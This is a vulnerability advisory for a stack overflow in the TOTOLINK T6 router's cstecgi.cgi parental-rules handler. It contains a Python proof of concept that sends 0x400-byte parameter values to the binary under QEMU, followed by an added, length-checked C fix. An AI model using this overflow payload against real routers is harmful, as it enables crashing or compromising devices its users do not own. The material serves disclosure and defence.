CVE-2022-32051: IoT-vuln/Totolink/T6-v2/2.setParentalRules at main · d1tto/IoT-vuln
TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the desc, week, sTime, eTime parameters in the function FUN_004133c4.
The vulnerability is in the router's web component, /web_cste/cgi-bin/cstecgi.cgi. The function FUN_004133c4 (at address 0x4133c4) reads the JSON parameters desc, week, sTime and eTime and, without checking their length, copies each one directly into a local variable on the stack, causing a stack overflow. The proof of concept below sends 0x400-byte values for all four parameters to the CGI binary run under qemu-mipsel-static with a gdb stub listening on port 1234:
```python
from pwn import *
import json

# Request body for the setParentalRules handler; each of the four unchecked
# string parameters is filled with 0x400 bytes to overrun the stack buffers.
data = {
    "topicurl": "setting/setParentalRules",
    "addEffect": "0",
    "mac": "12:34:56:78",
    "desc": "A" * 0x400,
    "week": "A" * 0x400,
    "sTime": "A" * 0x400,
    "eTime": "A" * 0x400,
}
data = json.dumps(data)
print(data)

# Run the CGI binary under user-mode QEMU with a gdb stub on port 1234 and the
# extracted firmware root (./root/) as sysroot. Like any CGI program it reads
# the body from stdin and its length from CONTENT_LENGTH.
argv = [
    "qemu-mipsel-static",
    "-g", "1234",
    "-L", "./root/",
    "-E", "CONTENT_LENGTH={}".format(len(data)),
    "-E", "REMOTE_ADDR=192.168.2.1",
    "./cstecgi.cgi",
]
a = process(argv=argv)
a.sendline(data.encode())
a.interactive()
```
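To show the bug class and its fix from the defender's side, here is an added example (not code from the d1tto/IoT-vuln repository or from the TOTOLINK firmware) modelling how a handler should copy these four JSON string parameters into fixed-size stack buffers. The buffer size FIELD_MAX, the function names and the sample rule values are assumptions; the real sizes in FUN_004133c4 are not on the page.

```c
#include <stdio.h>
#include <string.h>

/* Assumed stack buffer size per parameter; the real sizes used by
   FUN_004133c4 are not given on the page. */
#define FIELD_MAX 64

/* The bug on the page is the equivalent of strcpy(dst, src) here with no
   check on strlen(src). This hardened copy scans at most dst_len bytes,
   refuses a value that would not fit with its terminating NUL, and
   otherwise copies and terminates. Returns 0 on success, -1 if rejected. */
static int copy_param_checked(char *dst, size_t dst_len, const char *src) {
    size_t n = 0;
    while (n < dst_len && src[n] != '\0') n++;  /* never reads past dst_len */
    if (n >= dst_len)
        return -1;               /* too long: reject the whole request */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Models the handler's per-field copies of desc, week, sTime and eTime
   into local stack buffers. Returns 0 if every value fits, -1 otherwise. */
int set_parental_rules_checked(const char *desc, const char *week,
                               const char *sTime, const char *eTime) {
    char desc_buf[FIELD_MAX], week_buf[FIELD_MAX], stime_buf[FIELD_MAX], etime_buf[FIELD_MAX];
    if (copy_param_checked(desc_buf,  sizeof desc_buf,  desc)  != 0) return -1;
    if (copy_param_checked(week_buf,  sizeof week_buf,  week)  != 0) return -1;
    if (copy_param_checked(stime_buf, sizeof stime_buf, sTime) != 0) return -1;
    if (copy_param_checked(etime_buf, sizeof etime_buf, eTime) != 0) return -1;
    printf("rule accepted: desc=%s week=%s %s-%s\n",
           desc_buf, week_buf, stime_buf, etime_buf);
    return 0;
}

/* Feeds a PoC-sized value (0x400 bytes of 'A', constructed here) to the
   checked handler and returns its result, which is -1 (rejected). */
int poc_sized_value_rejected(void) {
    static char big[0x400 + 1];
    memset(big, 'A', 0x400);
    big[0x400] = '\0';
    return set_parental_rules_checked(big, "1234567", "08:00", "20:00");
}

int main(void) {
    printf("normal values -> %d\n", set_parental_rules_checked("kids", "1234567", "08:00", "20:00"));
    printf("0x400-byte desc -> %d\n", poc_sized_value_rejected());
    return 0;
}
```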